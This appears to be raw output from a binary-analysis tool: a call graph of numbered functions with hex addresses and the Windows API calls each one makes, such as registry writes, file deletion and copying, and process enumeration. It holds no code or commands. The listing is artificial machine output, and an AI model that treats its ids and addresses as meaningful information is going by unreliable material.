98371->98361 98372->98365 98373->98364 98374 e8f48c 98377 e8ca50 98374->98377 98378 e8ca6b 98377->98378 98379 ed14af 98378->98379 98380 ed1461 98378->98380 98407 e8ca90 98378->98407 98441 f061ff 253 API calls 2 library calls 98379->98441 98383 ed146b 98380->98383 98385 ed1478 98380->98385 98380->98407 98439 f06690 253 API calls 98383->98439 98403 e8cd60 98385->98403 98440 f06b2d 253 API calls 2 library calls 98385->98440 98387 e9e781 39 API calls 98387->98407 98390 ed1742 98390->98390 98392 e8cf30 39 API calls 98392->98407 98395 e8cd8e 98396 ed168b 98443 f06569 81 API calls 98396->98443 98399 e8bdc1 39 API calls 98399->98407 98400 e8b3fe 8 API calls 98400->98407 98403->98395 98444 ef3ef6 81 API calls __wsopen_s 98403->98444 98405 e8be6d 8 API calls 98405->98407 98407->98387 98407->98392 98407->98395 98407->98396 98407->98399 98407->98400 98407->98403 98407->98405 98408 e902f0 98407->98408 98431 e9e73b 39 API calls 98407->98431 98432 e9aa19 253 API calls 98407->98432 98433 ea05d2 5 API calls __Init_thread_wait 98407->98433 98434 e9bbd2 8 API calls 98407->98434 98435 ea0433 29 API calls __onexit 98407->98435 98436 ea0588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98407->98436 98437 e9f4ed 81 API calls 98407->98437 98438 e9f354 253 API calls 98407->98438 98442 edff4f 8 API calls 98407->98442 98425 e90326 ISource 98408->98425 98409 ea05d2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 98409->98425 98410 ed62cf 98450 ef3ef6 81 API calls __wsopen_s 98410->98450 98411 ea016b 8 API calls 98411->98425 98412 e91645 98418 e8be6d 8 API calls 98412->98418 98424 e9044d ISource 98412->98424 98415 ed5c7f 98422 e8be6d 8 API calls 98415->98422 98415->98424 98416 ed61fe 98449 ef3ef6 81 API calls __wsopen_s 98416->98449 98417 e8be6d 8 API calls 98417->98425 98418->98424 98422->98424 98423 e8bf07 8 API calls 98423->98425 98424->98407 98425->98409 98425->98410 98425->98411 98425->98412 98425->98415 98425->98416 98425->98417 98425->98423 98425->98424 98426 ea0433 29 API calls pre_c_initialization 98425->98426 98427 ed60b9 98425->98427 98429 ea0588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 98425->98429 98430 e90a5e ISource 98425->98430 98445 e91940 253 API calls 2 library calls 98425->98445 98446 e91e00 40 API calls ISource 98425->98446 98426->98425 98447 ef3ef6 81 API calls __wsopen_s 98427->98447 98429->98425 98448 ef3ef6 81 API calls __wsopen_s 98430->98448 98431->98407 98432->98407 98433->98407 98434->98407 98435->98407 98436->98407 98437->98407 98438->98407 98439->98385 98440->98403 98441->98407 98442->98407 98443->98403 98444->98390 98445->98425 98446->98425 98447->98430 98448->98424 98449->98424 98450->98424 98451 ed1a68 98452 ed1a70 98451->98452 98455 e8d4e5 98451->98455 98497 ee79af 8 API calls __fread_nolock 98452->98497 98454 ed1a82 98498 ee7928 8 API calls __fread_nolock 98454->98498 98457 ea016b 8 API calls 98455->98457 98459 e8d539 98457->98459 98458 ed1aac 98460 e902f0 253 API calls 98458->98460 98481 e8c2cd 98459->98481 98461 ed1ad3 98460->98461 98463 ed1ae7 98461->98463 98499 f060a2 53 API calls _wcslen 98461->98499 98466 ea016b 8 API calls 98468 e8d61e ISource 98466->98468 98467 ed1b04 98467->98455 98500 ee79af 8 API calls __fread_nolock 98467->98500 98471 e8b3fe 8 API calls 98468->98471 98473 ed1f1c 98468->98473 98474 ed1f37 98468->98474 98476 e8be6d 8 API calls 98468->98476 98477 e8c34b 8 API calls 98468->98477 98479 e8d8c1 ISource 98468->98479 98471->98468 98501 ee55d9 8 API calls ISource 98473->98501 98476->98468 98477->98468 98478 e8d95c ISource 98480 e8d973 98478->98480 98496 e9e284 8 API calls ISource 98478->98496 98479->98478 98488 e8c34b 98479->98488 98485 e8c2dd 98481->98485 98482 e8c2e5 98482->98466 98483 ea016b 8 API calls 98483->98485 98484 e8bf07 8 API calls 98484->98485 98485->98482 98485->98483 98485->98484 98486 e8c2cd 8 API calls 98485->98486 98487 e8be6d 8 API calls 98485->98487 98486->98485 98487->98485 98489 e8c359 98488->98489 98495 e8c381 ISource 98488->98495 98490 e8c367 98489->98490 98491 e8c34b 8 API calls 98489->98491 98492 e8c36d 98490->98492 98493 e8c34b 8 API calls 98490->98493 98491->98490 98494 e8c780 8 API calls 98492->98494 98492->98495 98493->98492 98494->98495 98495->98478 98496->98478 98497->98454 98498->98458 98499->98467 98500->98467 98501->98474 98502 e90e6f 98503 e90e83 98502->98503 98509 e913d5 98502->98509 98504 e90e95 98503->98504 98505 ea016b 8 API calls 98503->98505 98506 ed55d0 98504->98506 98507 e8b3fe 8 API calls 98504->98507 98508 e90eee 98504->98508 98505->98504 98606 ef1a29 8 API calls 98506->98606 98507->98504 98514 e9044d ISource 98508->98514 98535 e92ad0 98508->98535 98509->98504 98512 e8be6d 8 API calls 98509->98512 98512->98504 98513 ed62cf 98610 ef3ef6 81 API calls __wsopen_s 98513->98610 98515 e91645 98515->98514 98522 e8be6d 8 API calls 98515->98522 98517 ea016b 8 API calls 98533 e90326 ISource 98517->98533 98519 ed61fe 98609 ef3ef6 81 API calls __wsopen_s 98519->98609 98520 e8be6d 8 API calls 98520->98533 98521 ed5c7f 98521->98514 98526 e8be6d 8 API calls 98521->98526 98522->98514 98526->98514 98527 ea05d2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 98527->98533 98528 e8bf07 8 API calls 98528->98533 98529 ea0433 29 API calls pre_c_initialization 98529->98533 98530 ed60b9 98607 ef3ef6 81 API calls __wsopen_s 98530->98607 98532 e90a5e ISource 98608 ef3ef6 81 API calls __wsopen_s 98532->98608 98533->98513 98533->98514 98533->98515 98533->98517 98533->98519 98533->98520 98533->98521 98533->98527 98533->98528 98533->98529 98533->98530 98533->98532 98534 ea0588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 98533->98534 98604 e91940 253 API calls 2 library calls 98533->98604 98605 e91e00 40 API calls ISource 98533->98605 98534->98533 98536 e92f70 98535->98536 98537 e92b36 98535->98537 98951 ea05d2 5 API calls __Init_thread_wait 98536->98951 98539 ed7b7c 98537->98539 98540 e92b50 98537->98540 98955 f079f9 253 API calls 98539->98955 98611 e930e0 98540->98611 98542 e92f7a 98545 e92fbb 98542->98545 98547 e8b25f 8 API calls 98542->98547 98544 ed7b88 98544->98533 98550 ed7b91 98545->98550 98552 e92fec 98545->98552 98556 e92f94 98547->98556 98548 e930e0 9 API calls 98549 e92b76 98548->98549 98549->98545 98551 e92bac 98549->98551 98956 ef3ef6 81 API calls __wsopen_s 98550->98956 98551->98550 98575 e92bc8 __fread_nolock 98551->98575 98553 e8b3fe 8 API calls 98552->98553 98555 e92ff9 98553->98555 98953 e9e662 253 API calls 98555->98953 98952 ea0588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98556->98952 98558 ed7bb9 98957 ef3ef6 81 API calls __wsopen_s 98558->98957 98561 e92cef 98562 ed7c1c 98561->98562 98563 e92cfc 98561->98563 98959 f060a2 53 API calls _wcslen 98562->98959 98564 e930e0 9 API calls 98563->98564 98566 e92d09 98564->98566 98570 ed7d45 98566->98570 98572 e930e0 9 API calls 98566->98572 98567 ea016b 8 API calls 98567->98575 98568 e93032 98954 e9fe59 8 API calls 98568->98954 98569 ea019b 8 API calls 98569->98575 98580 ed7bb4 98570->98580 98960 ef3ef6 81 API calls __wsopen_s 98570->98960 98578 e92d23 98572->98578 98574 e902f0 253 API calls 98574->98575 98575->98555 98575->98558 98575->98561 98575->98567 98575->98569 98575->98574 98576 ed7bfd 98575->98576 98575->98580 98958 ef3ef6 81 API calls __wsopen_s 98576->98958 98577 e92d87 ISource 98577->98568 98577->98570 98577->98580 98582 e930e0 9 API calls 98577->98582 98585 e92e3b ISource 98577->98585 98601 e87953 CloseHandle 98577->98601 98621 f0cd16 98577->98621 98710 ef276a 98577->98710 98714 ef6561 98577->98714 98721 eee9c5 GetFileAttributesW 98577->98721 98723 f0eb63 98577->98723 98759 ef65b4 98577->98759 98764 e9be75 98577->98764 98821 ef5ed5 98577->98821 98851 efde5d 98577->98851 98856 f09eea 98577->98856 98859 e9f95e 98577->98859 98866 ef8e39 98577->98866 98885 ef95f6 98577->98885 98900 f0ac49 98577->98900 98905 ef4ad5 98577->98905 98910 ef874a 98577->98910 98937 ef6d2d 98577->98937 98578->98570 98578->98577 98581 e8be6d 8 API calls 98578->98581 98580->98533 98581->98577 98582->98577 98583 e92edd 98583->98533 98585->98583 98950 e9e29c 8 API calls ISource 98585->98950 98601->98577 98604->98533 98605->98533 98606->98514 98607->98532 98608->98514 98609->98514 98610->98514 98612 e93121 98611->98612 98616 e930fd 98611->98616 98961 ea05d2 5 API calls __Init_thread_wait 98612->98961 98614 e9312b 98614->98616 98962 ea0588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98614->98962 98620 e92b60 98616->98620 98963 ea05d2 5 API calls __Init_thread_wait 98616->98963 98617 e99ec7 98617->98620 98964 ea0588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98617->98964 98620->98548 98622 e8bf07 8 API calls 98621->98622 98623 f0cd39 98622->98623 98624 e8bf07 8 API calls 98623->98624 98625 f0cd42 98624->98625 98626 e8bf07 8 API calls 98625->98626 98627 f0cd4b 98626->98627 98637 f0cdda 98627->98637 98965 e88e70 98627->98965 98631 f0cda5 99014 f0d2f7 98631->99014 98633 f0cdd6 98634 f0ce0f RegConnectRegistryW 98633->98634 98635 f0ce76 RegCreateKeyExW 98633->98635 98633->98637 98634->98635 98634->98637 98638 f0cf0e 98635->98638 98644 f0cead 98635->98644 98637->98577 98639 f0d1d6 RegCloseKey 98638->98639 98641 e88e70 52 API calls 98638->98641 98639->98637 98640 f0d1e9 RegCloseKey 98639->98640 98640->98637 98642 f0cf29 98641->98642 98643 ea4db8 _strftime 40 API calls 98642->98643 98645 f0cf38 98643->98645 98644->98637 98649 f0ceff RegCloseKey 98644->98649 98646 f0cf44 98645->98646 98647 f0cf96 98645->98647 98648 e88e70 52 API calls 98646->98648 98650 e88e70 52 API calls 98647->98650 98651 f0cf4e _wcslen 98648->98651 98649->98637 98652 f0cfa0 98650->98652 98655 e88e70 52 API calls 98651->98655 98653 ea4db8 _strftime 40 API calls 98652->98653 98654 f0cfaf 98653->98654 98656 f0d047 98654->98656 98657 f0cfbf 98654->98657 98658 f0cf70 98655->98658 98659 e88e70 52 API calls 98656->98659 98660 e88e70 52 API calls 98657->98660 98661 e88e70 52 API calls 98658->98661 98662 f0d051 98659->98662 98663 f0cfc9 _wcslen 98660->98663 98709 f0cf85 98661->98709 98664 ea4db8 _strftime 40 API calls 98662->98664 98669 e88e70 52 API calls 98663->98669 98666 f0d060 98664->98666 98665 f0d2bb RegSetValueExW 98665->98639 98679 f0d01f 98665->98679 98667 f0d070 98666->98667 98668 f0d156 98666->98668 98670 e88e70 52 API calls 98667->98670 98672 e88e70 52 API calls 98668->98672 98671 f0cfeb 98669->98671 98673 f0d07a 98670->98673 98674 e88e70 52 API calls 98671->98674 98675 f0d160 98672->98675 98676 ea019b 8 API calls 98673->98676 98677 f0d000 RegSetValueExW 98674->98677 98678 ea4db8 _strftime 40 API calls 98675->98678 98680 f0d09f 98676->98680 98677->98639 98677->98679 98681 f0d16f 98678->98681 98679->98639 98682 e88e70 52 API calls 98680->98682 98683 f0d215 98681->98683 98684 f0d17f 98681->98684 98696 f0d0b4 98682->98696 98685 e88e70 52 API calls 98683->98685 99024 e8c92d 98684->99024 98688 f0d21f 98685->98688 98687 f0d187 98689 e88e70 52 API calls 98687->98689 98690 ea4db8 _strftime 40 API calls 98688->98690 98691 f0d198 RegSetValueExW 98689->98691 98692 f0d22e 98690->98692 98691->98639 98691->98679 98694 f0d265 98692->98694 98695 f0d23a 98692->98695 98700 e88e70 52 API calls 98694->98700 99029 e8c5df 39 API calls 98695->99029 98697 e88e70 52 API calls 98696->98697 98698 f0d106 RegSetValueExW 98697->98698 98698->98679 98702 f0d26f 98700->98702 98701 f0d242 98703 e88e70 52 API calls 98701->98703 98704 ea4db8 _strftime 40 API calls 98702->98704 98703->98691 98705 f0d27e 98704->98705 98705->98679 98706 ef276a 10 API calls 98705->98706 98707 f0d296 98706->98707 98708 e88e70 52 API calls 98707->98708 98708->98709 98709->98665 98711 ef2773 98710->98711 98713 ef2778 98710->98713 99035 ef183b 98711->99035 98713->98577 98715 e88e70 52 API calls 98714->98715 98716 ef6577 98715->98716 99060 eedb69 98716->99060 98718 ef657f 98719 ef6598 98718->98719 98720 ef6583 GetLastError 98718->98720 98719->98577 98720->98719 98722 eee9d1 98721->98722 98722->98577 98724 e8bf07 8 API calls 98723->98724 98725 f0eb7a 98724->98725 98726 e88e70 52 API calls 98725->98726 98727 f0eb89 98726->98727 99085 e87a14 98727->99085 98730 e88e70 52 API calls 98731 f0eba9 98730->98731 98732 f0ebc1 98731->98732 98733 f0ec26 98731->98733 98734 e8c92d 39 API calls 98732->98734 98735 e88e70 52 API calls 98733->98735 98737 f0ebc6 98734->98737 98736 f0ec2b 98735->98736 98738 f0ec73 98736->98738 98739 f0ec38 98736->98739 98737->98739 98741 f0ebdf 98737->98741 98742 f0ec8b 98738->98742 98744 e8c92d 39 API calls 98738->98744 99109 e86ab6 98739->99109 98743 e88685 8 API calls 98741->98743 98745 f0eca4 98742->98745 98748 e8c92d 39 API calls 98742->98748 98747 f0ebec 98743->98747 98744->98742 98746 e8be6d 8 API calls 98745->98746 98749 f0ecbe 98746->98749 98750 e87af4 8 API calls 98747->98750 98748->98745 99090 ee9b57 98749->99090 98753 f0ebfa 98750->98753 98752 f0ec45 98752->98577 98755 e88685 8 API calls 98753->98755 98754 f0ec21 99123 e87a59 98754->99123 98756 f0ec13 98755->98756 98757 e87af4 8 API calls 98756->98757 98757->98754 98760 e88e70 52 API calls 98759->98760 98761 ef65c7 98760->98761 99136 eee387 lstrlenW 98761->99136 98763 ef65d1 98763->98577 98765 e86ab6 8 API calls 98764->98765 98766 e9be8d 98765->98766 98767 ea016b 8 API calls 98766->98767 98772 ed8f7a 98766->98772 98769 e9bea6 98767->98769 98770 ea019b 8 API calls 98769->98770 98773 e9beb7 98770->98773 98771 e9bf1f 98776 e8c92d 39 API calls 98771->98776 98780 e9bf2c 98771->98780 98772->98771 99159 efa607 39 API calls 98772->99159 98774 e87953 CloseHandle 98773->98774 98775 e9bec2 98774->98775 98777 e8bf07 8 API calls 98775->98777 98778 ed8fdc 98776->98778 98779 e9beca 98777->98779 98778->98780 98781 ed8fe4 98778->98781 98782 e87953 CloseHandle 98779->98782 98783 e9fdc9 3 API calls 98780->98783 98784 e8c92d 39 API calls 98781->98784 98785 e9bed1 98782->98785 98789 e9bf33 98783->98789 98784->98789 98786 e88e70 52 API calls 98785->98786 98787 e9bedd 98786->98787 98788 e87953 CloseHandle 98787->98788 98790 e9bee7 98788->98790 98791 ed8ff9 98789->98791 98792 e9bf4e 98789->98792 98795 e86e52 5 API calls 98790->98795 98794 ea019b 8 API calls 98791->98794 98793 e87a14 8 API calls 98792->98793 98797 e9bf56 98793->98797 98798 ed8ffe 98794->98798 98796 e9bef8 98795->98796 98799 e9bf00 98796->98799 98800 ed8f72 98796->98800 99141 e9bfbc 98797->99141 98802 ed9012 98798->98802 98804 e841c9 2 API calls 98798->98804 98807 e86b12 13 API calls 98799->98807 99158 e87923 CloseHandle ISource 98800->99158 98810 ed9016 __fread_nolock 98802->98810 99160 ef1759 8 API calls ___scrt_fastfail 98802->99160 98803 e9bf65 98808 e87a59 8 API calls 98803->98808 98803->98810 98804->98802 98809 e9bf0e 98807->98809 98814 e9bf79 98808->98814 99155 e86afb SetFilePointerEx SetFilePointerEx SetFilePointerEx 98809->99155 98812 e9bf15 98812->98771 98813 ed8f3b 98812->98813 99157 eed4bf SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 98813->99157 98815 e9bfb3 98814->98815 98816 e87953 CloseHandle 98814->98816 98815->98577 98818 e9bfa7 98816->98818 98818->98815 99156 e87923 CloseHandle ISource 98818->99156 98819 ed8f52 98819->98771 98822 ef5fbd 98821->98822 98823 ef5ef4 98821->98823 98825 e88e70 52 API calls 98822->98825 98834 ef6011 98822->98834 98824 e8c92d 39 API calls 98823->98824 98826 ef5eff 98824->98826 98827 ef5fef 98825->98827 98828 e8c92d 39 API calls 98826->98828 98829 e88e70 52 API calls 98827->98829 98830 ef5f15 98828->98830 98831 ef6001 98829->98831 98830->98822 98833 e8bf07 8 API calls 98830->98833 99184 eed836 98831->99184 98835 ef5f26 98833->98835 98834->98577 98836 e8bf07 8 API calls 98835->98836 98837 ef5f2f 98836->98837 98838 e88e70 52 API calls 98837->98838 98839 ef5f3c 98838->98839 98840 e8694e 8 API calls 98839->98840 98841 ef5f4f 98840->98841 98842 e87af4 8 API calls 98841->98842 98843 ef5f60 98842->98843 98850 ef5f89 98843->98850 99227 eedc8e 98843->99227 98845 e8c92d 39 API calls 98845->98822 98847 e8b25f 8 API calls 98848 ef5f80 98847->98848 99230 eeda81 98848->99230 98850->98845 98852 e8b3fe 8 API calls 98851->98852 98853 efde70 98852->98853 98854 ef183b 10 API calls 98853->98854 98855 efde78 98854->98855 98855->98577 99309 f088b6 98856->99309 98858 f09efa 98858->98577 98860 e8c92d 39 API calls 98859->98860 98861 e9f972 98860->98861 98862 e9f97a timeGetTime 98861->98862 98863 edfac0 Sleep 98861->98863 98864 e8c92d 39 API calls 98862->98864 98865 e9f990 98864->98865 98865->98577 98867 e8bf07 8 API calls 98866->98867 98868 ef8e4a 98867->98868 98869 ea019b 8 API calls 98868->98869 98870 ef8e54 98869->98870 98871 e841a6 8 API calls 98870->98871 98872 ef8e5e 98871->98872 98873 e88e70 52 API calls 98872->98873 98874 ef8e6d 98873->98874 98875 e8557e 9 API calls 98874->98875 98876 ef8e78 98875->98876 98877 e88e70 52 API calls 98876->98877 98878 ef8e85 98877->98878 98879 e88e70 52 API calls 98878->98879 98880 ef8e97 98879->98880 98881 e88e70 52 API calls 98880->98881 98882 ef8eac GetPrivateProfileStringW 98881->98882 98883 e86ab6 8 API calls 98882->98883 98884 ef8ecf ISource 98883->98884 98884->98577 98886 e8bf07 8 API calls 98885->98886 98887 ef9607 98886->98887 98888 e88e70 52 API calls 98887->98888 98889 ef9616 98888->98889 98890 e8557e 9 API calls 98889->98890 98891 ef9621 98890->98891 98892 e88e70 52 API calls 98891->98892 98893 ef962e 98892->98893 98894 e88e70 52 API calls 98893->98894 98895 ef9640 98894->98895 98896 e88e70 52 API calls 98895->98896 98897 ef9655 WritePrivateProfileStringW 98896->98897 98898 ef966b WritePrivateProfileStringW 98897->98898 98899 ef9677 98897->98899 98898->98899 98899->98577 98901 e88e70 52 API calls 98900->98901 98902 f0ac65 98901->98902 99409 eedc9c CreateToolhelp32Snapshot Process32FirstW 98902->99409 98904 f0ac74 98904->98577 98906 e88e70 52 API calls 98905->98906 98907 ef4ae8 98906->98907 98908 eeda81 12 API calls 98907->98908 98909 ef4af0 98908->98909 98909->98577 98911 ef875a __wsopen_s 98910->98911 98912 e88e70 52 API calls 98911->98912 98913 ef877b 98912->98913 98914 e8c92d 39 API calls 98913->98914 98915 ef8799 98913->98915 98914->98915 98916 e88e70 52 API calls 98915->98916 98926 ef8973 98915->98926 98917 ef887c 98916->98917 98918 e8557e 9 API calls 98917->98918 98919 ef88a7 98918->98919 99427 ead913 98919->99427 98921 ef88cd 98922 ef88f7 GetCurrentDirectoryW SetCurrentDirectoryW 98921->98922 98923 ef8921 98922->98923 98922->98926 98924 eee387 4 API calls 98923->98924 98925 ef892a 98924->98925 98925->98926 98927 eee9c5 GetFileAttributesW 98925->98927 98926->98577 98928 ef8938 98927->98928 98929 ef8940 GetFileAttributesW SetFileAttributesW 98928->98929 98935 ef89cb 98928->98935 98930 ef8969 SetCurrentDirectoryW 98929->98930 98931 ef89b1 98929->98931 98930->98926 98932 ef89b5 SetCurrentDirectoryW 98931->98932 98933 ef8a02 SetCurrentDirectoryW 98931->98933 98932->98935 98933->98926 99430 ef9f9f FindFirstFileW 98935->99430 98936 ef89ea 98936->98933 98938 e88e70 52 API calls 98937->98938 98939 ef6d47 98938->98939 98940 ef6d84 98939->98940 98942 e8c92d 39 API calls 98939->98942 99474 eee783 98940->99474 98943 ef6d76 98942->98943 98943->98940 98945 e8557e 9 API calls 98943->98945 98944 ef6d92 98947 e87a59 8 API calls 98944->98947 98945->98940 98948 ef6dd7 98947->98948 98948->98577 98949 e88e70 52 API calls 98949->98944 98950->98585 98951->98542 98952->98545 98953->98568 98954->98568 98955->98544 98956->98580 98957->98580 98958->98580 98959->98578 98960->98580 98961->98614 98962->98616 98963->98617 98964->98620 98966 e88e85 98965->98966 98982 e88e82 98965->98982 98967 e88e8d 98966->98967 98968 e88ebb 98966->98968 99030 ea5556 26 API calls 98967->99030 98970 e88ecd 98968->98970 98977 ec6a29 98968->98977 98978 ec6b10 98968->98978 99031 e9fe8f 51 API calls 98970->99031 98971 e88e9d 98976 ea016b 8 API calls 98971->98976 98974 ec6b28 98974->98974 98979 e88ea7 98976->98979 98981 ea019b 8 API calls 98977->98981 98987 ec6aa2 98977->98987 99033 ea5513 26 API calls 98978->99033 98980 e8b25f 8 API calls 98979->98980 98980->98982 98984 ec6a72 98981->98984 98988 f0d6b1 98982->98988 98983 ea016b 8 API calls 98985 ec6a99 98983->98985 98984->98983 98986 e8b25f 8 API calls 98985->98986 98986->98987 99032 e9fe8f 51 API calls 98987->99032 98989 e8bceb 8 API calls 98988->98989 98990 f0d6bf 98989->98990 98991 e8bceb 8 API calls 98990->98991 98992 f0d6c7 98991->98992 98993 e8bceb 8 API calls 98992->98993 98994 f0d6cf 98993->98994 98995 f0d737 98994->98995 98997 e8627c 8 API calls 98994->98997 98996 e8bceb 8 API calls 98995->98996 99000 f0d735 98996->99000 98998 f0d6e5 98997->98998 98998->98995 98999 e8627c 8 API calls 98998->98999 99001 f0d6f7 98999->99001 99003 e88685 8 API calls 99000->99003 99001->98995 99002 f0d6fc 99001->99002 99004 e896d9 8 API calls 99002->99004 99005 f0d760 99003->99005 99009 f0d707 99004->99009 99006 e88685 8 API calls 99005->99006 99007 f0d777 99006->99007 99008 e879ed 8 API calls 99007->99008 99012 f0d780 99008->99012 99010 e88685 8 API calls 99009->99010 99011 f0d728 99010->99011 99013 e896d9 8 API calls 99011->99013 99012->98631 99013->99000 99015 e8c269 8 API calls 99014->99015 99016 f0d30e CharUpperBuffW 99015->99016 99017 f0d329 99016->99017 99018 e8bf07 8 API calls 99017->99018 99019 f0d334 99018->99019 99020 e88685 8 API calls 99019->99020 99021 f0d347 _wcslen 99020->99021 99022 e879ed 8 API calls 99021->99022 99023 f0d3a4 _wcslen 99021->99023 99022->99023 99023->98633 99025 e8c93e 99024->99025 99026 e8c945 99024->99026 99025->99026 99034 ea6661 39 API calls _strftime 99025->99034 99026->98687 99028 e8c988 99028->98687 99029->98701 99030->98971 99031->98971 99032->98978 99033->98974 99034->99028 99036 ef1852 99035->99036 99052 ef196b 99035->99052 99037 ef1872 99036->99037 99038 ef189f 99036->99038 99040 ef18b6 99036->99040 99037->99038 99041 ef1886 99037->99041 99039 ea019b 8 API calls 99038->99039 99046 ef1894 __fread_nolock 99039->99046 99043 ea019b 8 API calls 99040->99043 99050 ef18d3 99040->99050 99044 ea019b 8 API calls 99041->99044 99042 ef18fa 99045 ea019b 8 API calls 99042->99045 99043->99050 99044->99046 99047 ef1900 99045->99047 99048 ea016b 8 API calls 99046->99048 99054 e9c1f1 99047->99054 99048->99052 99050->99041 99050->99042 99050->99046 99052->98713 99055 ea019b 8 API calls 99054->99055 99056 e9c208 99055->99056 99057 ea016b 8 API calls 99056->99057 99058 e9c214 99057->99058 99059 e9f9e2 10 API calls 99058->99059 99059->99046 99061 e8bf07 8 API calls 99060->99061 99062 eedb88 99061->99062 99063 e8bf07 8 API calls 99062->99063 99064 eedb91 99063->99064 99065 e8bf07 8 API calls 99064->99065 99066 eedb9a 99065->99066 99067 e8557e 9 API calls 99066->99067 99068 eedba5 99067->99068 99069 eee9c5 GetFileAttributesW 99068->99069 99070 eedbae 99069->99070 99071 eedbc0 99070->99071 99072 e865a4 8 API calls 99070->99072 99073 e8694e 8 API calls 99071->99073 99072->99071 99074 eedbd4 FindFirstFileW 99073->99074 99075 eedbf3 99074->99075 99076 eedc60 FindClose 99074->99076 99075->99076 99077 eedc3b FindNextFileW 99075->99077 99079 e8be6d 8 API calls 99075->99079 99080 e87af4 8 API calls 99075->99080 99082 e865a4 8 API calls 99075->99082 99081 eedc6b 99076->99081 99077->99075 99078 eedc4f 99077->99078 99078->99075 99079->99075 99080->99075 99081->98718 99083 eedc2c DeleteFileW 99082->99083 99083->99077 99084 eedc57 FindClose 99083->99084 99084->99081 99086 ea019b 8 API calls 99085->99086 99087 e87a39 99086->99087 99088 ea016b 8 API calls 99087->99088 99089 e87a47 99088->99089 99089->98730 99091 e8bf07 8 API calls 99090->99091 99092 ee9b6d 99091->99092 99093 e87a14 8 API calls 99092->99093 99094 ee9b81 99093->99094 99095 ee96e3 41 API calls 99094->99095 99101 ee9ba3 99094->99101 99096 ee9b9d 99095->99096 99098 e88685 8 API calls 99096->99098 99096->99101 99098->99101 99099 e88685 8 API calls 99099->99101 99100 e87af4 8 API calls 99100->99101 99101->99099 99101->99100 99102 ee9c42 99101->99102 99105 ee9c26 99101->99105 99129 ee96e3 99101->99129 99103 e8be6d 8 API calls 99102->99103 99104 ee9c51 99102->99104 99103->99104 99104->98754 99106 e88685 8 API calls 99105->99106 99107 ee9c36 99106->99107 99108 e87af4 8 API calls 99107->99108 99108->99102 99110 ec587b 99109->99110 99111 e86ac6 99109->99111 99112 ec588c 99110->99112 99113 e884b7 8 API calls 99110->99113 99116 ea016b 8 API calls 99111->99116 99114 e8bceb 8 API calls 99112->99114 99113->99112 99115 ec5896 99114->99115 99115->99115 99117 e86ad9 99116->99117 99118 e86ae2 99117->99118 99119 e86af4 99117->99119 99121 e8b25f 8 API calls 99118->99121 99120 e8bf07 8 API calls 99119->99120 99122 e86aea 99120->99122 99121->99122 99122->98752 99124 e87a9e 99123->99124 99125 e87a65 99123->99125 99126 e8be6d 8 API calls 99124->99126 99128 e87a78 99124->99128 99127 ea016b 8 API calls 99125->99127 99126->99128 99127->99128 99128->98752 99130 ee9703 _wcslen 99129->99130 99131 ee97f7 99130->99131 99132 ee9738 99130->99132 99135 ee97f2 99130->99135 99134 e9e2e5 41 API calls 99131->99134 99131->99135 99133 e9e2e5 41 API calls 99132->99133 99132->99135 99133->99132 99134->99131 99135->99101 99137 eee3a5 GetFileAttributesW 99136->99137 99138 eee3cf 99136->99138 99137->99138 99139 eee3b1 FindFirstFileW 99137->99139 99138->98763 99139->99138 99140 eee3c2 FindClose 99139->99140 99140->99138 99142 e9c003 99141->99142 99144 e9bfc7 99141->99144 99143 e8bceb 8 API calls 99142->99143 99153 eed2ab 99143->99153 99144->99142 99145 e9bfd6 99144->99145 99147 e9bfeb 99145->99147 99150 e9bff8 99145->99150 99146 eed2da 99146->98803 99161 e9c009 99147->99161 99149 eed249 2 API calls 99149->99153 99168 eed3b2 12 API calls 99150->99168 99151 e9bff4 99151->98803 99153->99146 99153->99149 99169 e8acc0 8 API calls __fread_nolock 99153->99169 99155->98812 99156->98815 99157->98819 99158->98772 99159->98772 99160->98810 99162 e9c1f1 8 API calls 99161->99162 99163 e9c021 99162->99163 99170 e8adc1 99163->99170 99166 e88774 10 API calls 99167 e9c03c 99166->99167 99167->99151 99168->99151 99169->99153 99176 e9feaa 99170->99176 99172 e8ae07 99172->99166 99172->99167 99173 e8b050 2 API calls 99174 e8add2 99173->99174 99174->99172 99174->99173 99183 e8b0e3 8 API calls __fread_nolock 99174->99183 99177 e9febb 99176->99177 99178 edfe13 99176->99178 99177->99174 99179 ea016b 8 API calls 99178->99179 99180 edfe1d 99179->99180 99181 ea019b 8 API calls 99180->99181 99182 edfe32 99181->99182 99183->99174 99185 e8bf07 8 API calls 99184->99185 99186 eed853 99185->99186 99187 e8bf07 8 API calls 99186->99187 99188 eed85b 99187->99188 99189 e8bf07 8 API calls 99188->99189 99190 eed863 99189->99190 99191 e8557e 9 API calls 99190->99191 99192 eed86d 99191->99192 99193 e8557e 9 API calls 99192->99193 99194 eed877 99193->99194 99242 eee958 99194->99242 99196 eed882 99197 eee9c5 GetFileAttributesW 99196->99197 99198 eed88d 99197->99198 99199 eed89f 99198->99199 99200 e865a4 8 API calls 99198->99200 99201 eee9c5 GetFileAttributesW 99199->99201 99200->99199 99202 eed8a7 99201->99202 99203 eed8b4 99202->99203 99205 e865a4 8 API calls 99202->99205 99204 e8bf07 8 API calls 99203->99204 99206 eed8bc 99204->99206 99205->99203 99207 e8bf07 8 API calls 99206->99207 99208 eed8c4 99207->99208 99209 e8694e 8 API calls 99208->99209 99210 eed8d5 FindFirstFileW 99209->99210 99211 eeda23 FindClose 99210->99211 99226 eed8f8 99210->99226 99216 eeda21 99211->99216 99212 eed9ef FindNextFileW 99212->99226 99213 e8b25f 8 API calls 99213->99226 99215 e87af4 8 API calls 99215->99226 99216->98834 99217 e865a4 8 API calls 99217->99226 99218 eedc8e 4 API calls 99218->99226 99219 eed984 99222 e9e2e5 41 API calls 99219->99222 99223 eed9ad MoveFileW 99219->99223 99224 eed99d DeleteFileW 99219->99224 99220 eeda12 FindClose 99220->99216 99221 eeda5c CopyFileExW 99221->99226 99222->99219 99223->99226 99224->99226 99225 eed9ca DeleteFileW 99225->99226 99226->99211 99226->99212 99226->99213 